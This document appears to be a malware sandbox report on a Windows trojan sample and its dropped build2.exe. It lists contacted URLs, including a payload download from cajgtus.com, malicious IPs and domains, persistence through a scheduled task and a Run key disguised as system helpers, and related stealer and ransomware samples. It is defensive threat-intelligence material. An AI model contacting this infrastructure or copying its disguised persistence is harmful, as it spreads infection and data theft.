https://www.youtube.com/	build2.exe, 00000008.00000002.2352727542.0000000000948000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1812961840.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1815064490.00000000009BE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg	build2.exe, 00000008.00000003.1874722155.00000000009BE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://store.steampowered.com/privacy_agreement/	build2.exe, 00000008.00000002.2352727542.00000000009A2000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1814804733.00000000009B2000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000002.2351838122.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1910879283.00000000009DE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1893256555.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1838899855.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1874722155.00000000009BE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://95.217.9.149/softokn3.dllLEP$	build2.exe, 00000008.00000002.2352727542.00000000009A2000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0	build2.exe, 00000008.00000002.2352727542.00000000009A2000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000002.2351838122.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1910879283.00000000009DE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1893256555.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1838899855.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1874722155.00000000009BE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=ZVlkBFZXqRp1&l=e	build2.exe, 00000008.00000002.2352727542.00000000009A2000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000002.2351838122.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1910879283.00000000009DE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1893256555.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1838899855.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1874722155.00000000009BE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://api.2ip.ua/geo.json9	mJVVW85CnW.exe, 00000001.00000003.1704320572.000000000082D000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.youtube.com/	mJVVW85CnW.exe, 00000006.00000003.1787707351.0000000003570000.00000004.00001000.00020000.00000000.sdmp	false		high
https://wetransfer.com/downloads/54cdfd152fe98eedb628a1f4ddb7076420240421150208/403a27	mJVVW85CnW.exe, 00000004.00000002.2333415250.0000000000706000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000006.00000002.4155930809.0000000000912000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000006.00000002.4155930809.000000000093A000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.google.com/recaptcha/	build2.exe, 00000008.00000003.1815064490.00000000009BE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://checkout.steampowered.com/	build2.exe, 00000008.00000002.2352727542.0000000000948000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1812961840.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1815064490.00000000009BE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english	build2.exe, 00000008.00000002.2352727542.00000000009A2000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000002.2351838122.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1910879283.00000000009DE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1893256555.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1838899855.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1874722155.00000000009BE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=english	build2.exe, 00000008.00000002.2352727542.00000000009A2000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000002.2351838122.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1910879283.00000000009DE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1893256555.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1838899855.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1874722155.00000000009BE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png	build2.exe, 00000008.00000002.2352727542.00000000009A2000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1814804733.00000000009B2000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000002.2351838122.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1910879283.00000000009DE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1893256555.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1838899855.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1874722155.00000000009BE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englis	build2.exe, 00000008.00000002.2352727542.00000000009A2000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000002.2351838122.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1910879283.00000000009DE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1893256555.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1838899855.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1874722155.00000000009BE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC	build2.exe, 00000008.00000002.2352727542.00000000009A2000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000002.2351838122.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1910879283.00000000009DE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1893256555.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1838899855.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1874722155.00000000009BE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://store.steampowered.com/;	build2.exe, 00000008.00000002.2352727542.0000000000948000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1812961840.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1815064490.00000000009BE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://store.steampowered.com/about/	build2.exe, 00000008.00000003.1874722155.00000000009BE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://steamcommunity.com/my/wishlist/	build2.exe, 00000008.00000002.2352727542.00000000009A2000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1814804733.00000000009B2000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000002.2351838122.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1910879283.00000000009DE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1893256555.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1838899855.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1874722155.00000000009BE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://t.me/irfailAt	build2.exe, 00000007.00000002.1803218835.0000000003670000.00000040.00001000.00020000.00000000.sdmp, build2.exe, 00000008.00000002.2351838122.0000000000400000.00000040.00000400.00020000.00000000.sdmp	false		high
https://github.com/react-native-community/react-native-netinfo	mJVVW85CnW.exe, 00000004.00000003.1806077260.00000000097E0000.00000004.00001000.00020000.00000000.sdmp	false		high
https://95.217.9.149	build2.exe, 00000008.00000003.1874722155.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000002.2351838122.0000000000400000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://help.steampowered.com/en/	build2.exe, 00000008.00000002.2352727542.00000000009A2000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1814804733.00000000009B2000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000002.2351838122.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1910879283.00000000009DE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1893256555.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1838899855.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1874722155.00000000009BE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/	build2.exe, 00000008.00000002.2352727542.0000000000948000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1812961840.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1815064490.00000000009BE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://steamcommunity.com/market/	build2.exe, 00000008.00000002.2352727542.00000000009A2000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1814804733.00000000009B2000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000002.2351838122.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1910879283.00000000009DE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1893256555.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1838899855.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1874722155.00000000009BE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://store.steampowered.com/news/	build2.exe, 00000008.00000002.2352727542.00000000009A2000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1814804733.00000000009B2000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000002.2351838122.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1910879283.00000000009DE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1893256555.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1838899855.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1874722155.00000000009BE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.akamai.steamstatic.com/	build2.exe, 00000008.00000003.1815064490.00000000009BE000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.amazon.com/	mJVVW85CnW.exe, 00000004.00000003.1787301168.00000000097E0000.00000004.00001000.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	build2.exe, 00000008.00000003.2002995683.0000000000AB2000.00000004.00000020.00020000.00000000.sdmp	false		high
http://store.steampowered.com/subscriber_agreement/	build2.exe, 00000008.00000002.2352727542.00000000009A2000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1910879283.00000000009DE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1893256555.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1838899855.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1874722155.00000000009BE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org	build2.exe, 00000008.00000002.2352727542.00000000009A2000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1910879283.00000000009DE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1893256555.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1838899855.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1874722155.00000000009BE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17	build2.exe, 00000008.00000003.1990031442.0000000000A6B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000002.2351838122.0000000000558000.00000040.00000400.00020000.00000000.sdmp	false		high
http://www.twitter.com/	mJVVW85CnW.exe, 00000006.00000003.1787622498.0000000003570000.00000004.00001000.00020000.00000000.sdmp	false		high
https://recaptcha.net/recaptcha/;	build2.exe, 00000008.00000002.2352727542.0000000000948000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1812961840.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1815064490.00000000009BE000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://cajgtus.com/files/1/build3.exe$runALn	mJVVW85CnW.exe, 00000004.00000002.2333415250.00000000006AB000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
190.218.33.18	sdfjhuz.com	Panama	18809	CableOndaPA	true
58.151.148.90	cajgtus.com	Korea Republic of	17858	POWERVIS-AS-KRLGPOWERCOMMKR	true
104.106.57.101	steamcommunity.com	United States	16625	AKAMAI-ASUS	false
95.217.9.149	unknown	Germany	24940	HETZNER-ASDE	false
104.21.65.24	api.2ip.ua	United States	13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1430659
Start date and time:	2024-04-24 01:43:26 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 13m 10s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	34
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	mJVVW85CnW.exe renamed because original name is a hash value
Original Sample Name:	47ff102b3b17c3d0d18efa09e2cee04e.exe
Detection:	MAL
Classification:	mal100.rans.spre.troj.spyw.evad.winEXE@47/1472@8/5
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 96% Number of executed functions: 69 Number of non-executed functions: 217
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtCreateFile calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadFile calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Report size getting too big, too many NtSetInformationFile calls found.
Report size getting too big, too many NtWriteFile calls found.
VT rate limit hit for: mJVVW85CnW.exe

Simulations

Behavior and APIs

Time	Type	Description
00:44:20	Task Scheduler	Run new task: Time Trigger Task path: C:\Users\user\AppData\Local\a2ba404d-ff63-4198-ab65-c81226d8b003\mJVVW85CnW.exe s>--Task
00:44:23	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run SysHelper "C:\Users\user\AppData\Local\a2ba404d-ff63-4198-ab65-c81226d8b003\mJVVW85CnW.exe" --AutoStart
00:44:32	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run SysHelper "C:\Users\user\AppData\Local\a2ba404d-ff63-4198-ab65-c81226d8b003\mJVVW85CnW.exe" --AutoStart
00:44:44	Task Scheduler	Run new task: Azure-Update-Task path: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe
01:44:26	API Interceptor	1x Sleep call for process: mJVVW85CnW.exe modified
01:44:40	API Interceptor	1x Sleep call for process: build2.exe modified
01:45:29	API Interceptor	6381063x Sleep call for process: mstsca.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
58.151.148.90	a6GOcbfMde.exe	Get hash	malicious	SmokeLoader	Browse	nidoe.org/tmp/index.php
	oowDCOLXv5.exe	Get hash	malicious	LummaC, Babuk, Djvu, RedLine, SmokeLoader, Stealc, Vidar	Browse	brusuax.com/dl/build2.exe
	0ns5NDsgwK.exe	Get hash	malicious	Amadey, SmokeLoader	Browse	sjyey.com/tmp/index.php
	apeoxsTscm.exe	Get hash	malicious	Clipboard Hijacker, SmokeLoader	Browse	sjyey.com/tmp/index.php
	file.exe	Get hash	malicious	Glupteba, RedLine, SmokeLoader, Stealc, Vidar, Xmrig	Browse	brusuax.com/dl/build2.exe
	file.exe	Get hash	malicious	Glupteba, SmokeLoader, Socks5Systemz, Stealc, Vidar	Browse	trmpc.com/check/index.php
	1eeeb5aa7dcd72a9912e8f54c60b07915d4c7fb4180c2e497483357ab9ac8640_dump.exe	Get hash	malicious	LummaC, Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, SmokeLoader, Vidar	Browse	brusuax.com/dl/build2.exe
	0BLup98FTz.exe	Get hash	malicious	Amadey	Browse	cbinr.com/forum/index.php
	UiS7Aq9P48.exe	Get hash	malicious	Amadey	Browse	cbinr.com/forum/index.php
	M6xATHbwxY.exe	Get hash	malicious	Glupteba, RedLine, SmokeLoader	Browse	humydrole.com/tmp/index.php
95.217.9.149	JfOWsh7v0r.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Vidar	Browse
	AaIo4VGgvO.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Vidar	Browse
	file.exe	Get hash	malicious	Vidar	Browse
	file.exe	Get hash	malicious	Vidar	Browse
104.21.65.24	2llKbb9pR7.exe	Get hash	malicious	LummaC, Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, RedLine, SmokeLoader	Browse
	CDssd7jEvY.exe	Get hash	malicious	LummaC, Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, SmokeLoader, Vidar	Browse
	SecuriteInfo.com.W32.Kryptik.GYGF.tr.29287.4482.exe	Get hash	malicious	LummaC, Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, SmokeLoader, Vidar	Browse
	WAhYftpepO.exe	Get hash	malicious	LummaC, Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, SmokeLoader, Vidar	Browse
	6uVlPQSJ4e.exe	Get hash	malicious	LummaC, Babuk, Clipboard Hijacker, Djvu, Glupteba, LummaC Stealer, SmokeLoader	Browse
	vHpxL6E2sQ.exe	Get hash	malicious	LummaC, Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, PureLog Stealer, SmokeLoader	Browse
	file.exe	Get hash	malicious	LummaC, Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, PureLog Stealer, SmokeLoader	Browse
	wn1gncGy2T.exe	Get hash	malicious	LummaC, Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, PureLog Stealer, SmokeLoader	Browse
	noDmpaxL0x.exe	Get hash	malicious	Babuk, Djvu, Glupteba, SmokeLoader, Xehook Stealer	Browse
	doTtQFWKly.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Glupteba, SmokeLoader, Vidar, Xehook Stealer	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
cajgtus.com	JfOWsh7v0r.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Vidar	Browse	211.181.24.132
cajgtus.com	AaIo4VGgvO.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Vidar	Browse	189.195.132.134
steamcommunity.com	JfOWsh7v0r.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Vidar	Browse	23.76.43.59
	AaIo4VGgvO.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Vidar	Browse	104.67.208.180
	file.exe	Get hash	malicious	Vidar	Browse	23.47.27.74
	file.exe	Get hash	malicious	Vidar	Browse	23.65.246.108
	file.exe	Get hash	malicious	Vidar	Browse	184.27.10.105
	file.exe	Get hash	malicious	Vidar	Browse	23.61.62.148
	file.exe	Get hash	malicious	Vidar	Browse	184.30.122.179
	SamFw Tool 4.exe	Get hash	malicious	Vidar	Browse	23.4.32.216
	8xFzJWrEIa.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, RedLine, SmokeLoader, Vidar	Browse	23.4.32.216
	file.exe	Get hash	malicious	Vidar	Browse	23.61.62.148
sdfjhuz.com	JfOWsh7v0r.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Vidar	Browse	189.232.19.193
	AaIo4VGgvO.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Vidar	Browse	187.228.55.117
	8xFzJWrEIa.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, RedLine, SmokeLoader, Vidar	Browse	179.27.75.59
	2llKbb9pR7.exe	Get hash	malicious	LummaC, Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, RedLine, SmokeLoader	Browse	187.134.67.105
	MdeeRbWvqe.exe	Get hash	malicious	LummaC, Babuk, Djvu, LummaC Stealer, RedLine, SmokeLoader	Browse	181.128.130.193
	CDssd7jEvY.exe	Get hash	malicious	LummaC, Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, SmokeLoader, Vidar	Browse	186.112.12.51
	SecuriteInfo.com.W32.Kryptik.GYGF.tr.29287.4482.exe	Get hash	malicious	LummaC, Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, SmokeLoader, Vidar	Browse	190.249.187.165
	SecuriteInfo.com.W32.Kryptik.GYGF.tr.12827.18803.exe	Get hash	malicious	LummaC, Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, SmokeLoader, Vidar	Browse	186.104.27.238
	Grkradw6vd.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Vidar	Browse	220.125.3.190
	WAhYftpepO.exe	Get hash	malicious	LummaC, Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, SmokeLoader, Vidar	Browse	186.182.55.44
api.2ip.ua	JfOWsh7v0r.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Vidar	Browse	172.67.139.220
	AaIo4VGgvO.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Vidar	Browse	172.67.139.220
	8xFzJWrEIa.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, RedLine, SmokeLoader, Vidar	Browse	172.67.139.220
	2llKbb9pR7.exe	Get hash	malicious	LummaC, Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, RedLine, SmokeLoader	Browse	104.21.65.24
	MdeeRbWvqe.exe	Get hash	malicious	LummaC, Babuk, Djvu, LummaC Stealer, RedLine, SmokeLoader	Browse	172.67.139.220
	CDssd7jEvY.exe	Get hash	malicious	LummaC, Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, SmokeLoader, Vidar	Browse	104.21.65.24
	SecuriteInfo.com.W32.Kryptik.GYGF.tr.29287.4482.exe	Get hash	malicious	LummaC, Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, SmokeLoader, Vidar	Browse	104.21.65.24
	SecuriteInfo.com.W32.Kryptik.GYGF.tr.12827.18803.exe	Get hash	malicious	LummaC, Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, SmokeLoader, Vidar	Browse	172.67.139.220
	Grkradw6vd.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Vidar	Browse	172.67.139.220
	WAhYftpepO.exe	Get hash	malicious	LummaC, Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, SmokeLoader, Vidar	Browse	104.21.65.24

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
POWERVIS-AS-KRLGPOWERCOMMKR	sora.x86.elf	Get hash	malicious	Mirai	Browse	125.243.74.98
	sora.arm7.elf	Get hash	malicious	Mirai	Browse	117.110.199.23
	SecuriteInfo.com.Trojan.InstallCore.4086.15026.2213.exe	Get hash	malicious	PrivateLoader, PureLog Stealer	Browse	124.50.53.34
	BitTorrent-7.6.exe	Get hash	malicious	Unknown	Browse	49.172.134.64
	YKLjlQEZKY.elf	Get hash	malicious	Mirai	Browse	112.148.129.89
	jdsfl.arm.elf	Get hash	malicious	Mirai	Browse	182.208.172.27
	jdsfl.x86.elf	Get hash	malicious	Mirai	Browse	119.65.100.114
	caA474oBY2.elf	Get hash	malicious	Mirai	Browse	112.148.129.61
	SgtB2WW8ys.elf	Get hash	malicious	Mirai	Browse	115.140.51.188
	aQvU3QHA3N.elf	Get hash	malicious	Unknown	Browse	112.150.0.178
AKAMAI-ASUS	https://netorg442802-my.sharepoint.com/:b:/g/personal/darek_daronto_com/EeXtnEaZ3XJBqGk13it6odUB-K9vuYAC7zp7SfyciZ3BpQ?e=nkKu2w	Get hash	malicious	HtmlDropper, HTMLPhisher	Browse	23.43.51.75
	EXTERNAL Bonnie St Dryden is inviting you to collaborate on One_docx(Apr 23) DOC3848493.msg	Get hash	malicious	HTMLPhisher	Browse	23.223.31.231
	https://lithiuimvalley.com/ssd	Get hash	malicious	HtmlDropper, HTMLPhisher	Browse	96.17.33.186
	file.exe	Get hash	malicious	Vidar	Browse	23.47.27.74
	https://sunhos-my.sharepoint.com/:b:/g/personal/mcaffrey_suncrestcare_com/EVEm8VhV9TBDp7AQUrliImYB4Kt7rXcd_m6-8qNUjxBhTA?e=P3XNTL&xsdata=MDV8MDJ8cHJpY2hhcmRzb25AY2FsdG9uLmNvbXxkM2U5ZTc1MTlkNDA0NmI2OWMzODA4ZGM2M2JhOTA4Y3w3YjU1NzU2YTg5NTg0ZWNlODFkYzVkYTZhYmRiNmE5N3wwfDB8NjM4NDk0OTAwMTUyMzMwMjUxfFVua25vd258VFdGcGJHWnNiM2Q4ZXlKV0lqb2lNQzR3TGpBd01EQWlMQ0pRSWpvaVYybHVNeklpTENKQlRpSTZJazFoYVd3aUxDSlhWQ0k2TW4wPXwwfHx8&sdata=TldIbEg2OTJiSkRUS29RRElmU3dYbTBRQUlqUTBBMXZPcGlIaTlzNnlOQT0%3d	Get hash	malicious	HTMLPhisher	Browse	23.50.113.17
	file.exe	Get hash	malicious	Vidar	Browse	23.65.246.108
	Remittance. #U0440df.html	Get hash	malicious	HTMLPhisher	Browse	23.193.106.150
	https://netorgft12232017-my.sharepoint.com:443/:f:/g/personal/lisa_imjts_com/EsnpAMoHQfhBluK8Y5tDE68BaHrT-12huxTJR_ZqVWR4tA?e=5%3aZZh3dZ&at=9	Get hash	malicious	Unknown	Browse	23.210.240.138
	https://www.msn.com/en-us/autos/enthusiasts/what-s-the-difference-between-a-shelby-mustang-and-a-regular-mustang/ar-AA1ntM5Z?ocid=entnewsntp&pc=U531&cvid=8b8aa9e3e14d4164a6a2181020104694&ei=36	Get hash	malicious	Unknown	Browse	23.54.44.246
	1mHUcsxKG6.elf	Get hash	malicious	Mirai	Browse	23.61.238.0
HETZNER-ASDE	JfOWsh7v0r.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Vidar	Browse	95.217.9.149
	AaIo4VGgvO.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Vidar	Browse	95.217.9.149
	file.exe	Get hash	malicious	Vidar	Browse	95.217.244.99
	BW38j8Jkbl.exe	Get hash	malicious	Pony	Browse	144.76.41.117
	https://webmail.cmxserver.com/authsecure/index.php?email=kaylen@virtualintelligencebriefing.com	Get hash	malicious	Unknown	Browse	136.243.80.35
